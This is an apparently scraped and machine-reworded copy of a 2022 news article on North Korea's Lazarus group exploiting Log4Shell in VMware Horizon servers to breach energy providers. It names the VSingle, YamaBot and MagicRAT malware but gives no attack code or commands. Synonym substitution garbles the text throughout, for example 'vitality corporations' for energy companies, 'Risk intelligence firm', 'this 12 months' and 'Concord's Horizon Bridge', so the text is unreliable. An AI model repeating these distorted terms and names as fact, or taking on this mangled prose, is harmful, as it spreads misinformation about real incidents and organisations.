• Sun. Dec 4th, 2022


Bank Of America CISCO Mcast news

North Korea’s Lazarus hackers are exploiting Log4j flaw to hack US vitality corporations • TechCrunch


Sep 22, 2022

Safety researchers have linked a brand new cyber espionage marketing campaign focusing on U.S., Canadian and Japanese vitality suppliers to the North Korean state-sponsored Lazarus hacking group.

Risk intelligence firm Cisco Talos mentioned Thursday that it has noticed Lazarus — also referred to as APT38 — focusing on unnamed vitality suppliers in the US, Canada and Japan between February and July this 12 months. In keeping with Cisco’s analysis, the hackers used a year-old vulnerability in Log4j, generally known as Log4Shell, to compromise internet-exposed VMware Horizon servers to ascertain an preliminary foothold onto a sufferer’s enterprise community, earlier than deploying bespoke malware generally known as “VSingle” and “YamaBot” to ascertain long-term persistent entry. YamaBot was not too long ago attributed to the Lazarus APT by Japan’s nationwide cyber emergency response crew, generally known as CERT.

Particulars of this espionage marketing campaign had been first revealed by Symantec in April this 12 months, which attributed the operation to “Stonefly,” one other North Korean hacking group that has some overlaps with Lazarus.

Nonetheless, Cisco Talos additionally noticed a beforehand unknown distant entry trojan — or RAT — named “MagicRAT,” attributed to Lazarus Group, which the hackers use for reconnaissance and stealing credentials.

“The principle purpose of those assaults was prone to set up long-term entry into sufferer networks to conduct espionage operations in assist of North Korean authorities goals,” wrote Talos researchers Jung soo An, Asheer Malhotra and Vitor Ventura. “This exercise aligns with historic Lazarus intrusions focusing on important infrastructure and vitality corporations to ascertain long-term entry to siphon off proprietary mental property.”

The Lazarus Group is a financially motivated hacking group backed by the North Korean state that’s finest identified for the high-profile Sony hack in 2016 and the WannaCry ransomware assault in 2017. Lazarus can also be pushed by efforts to assist North Korea’s state goals, together with army analysis and improvement and evasion of worldwide sanctions.

Nonetheless, the group has in current months turned its consideration to blockchain and cryptocurrency organizations. It has been linked to the current theft of $100 million in crypto belongings from Concord’s Horizon Bridge, and the theft of $625 million in cryptocurrency from the Ronin Community, an Ethereum-based sidechain made for the favored play-to-earn recreation Axie Infinity.

Pyongyang has lengthy used stolen cryptocurrency and the theft of different info to fund its nuclear weapons program.

In July, the U.S. authorities provided a $10 million reward for info on members of state-sponsored North Korean risk teams, together with Lazarus, doubling the quantity that the U.S. State Division introduced in April.

Supply hyperlink

Leave a Reply

Your email address will not be published.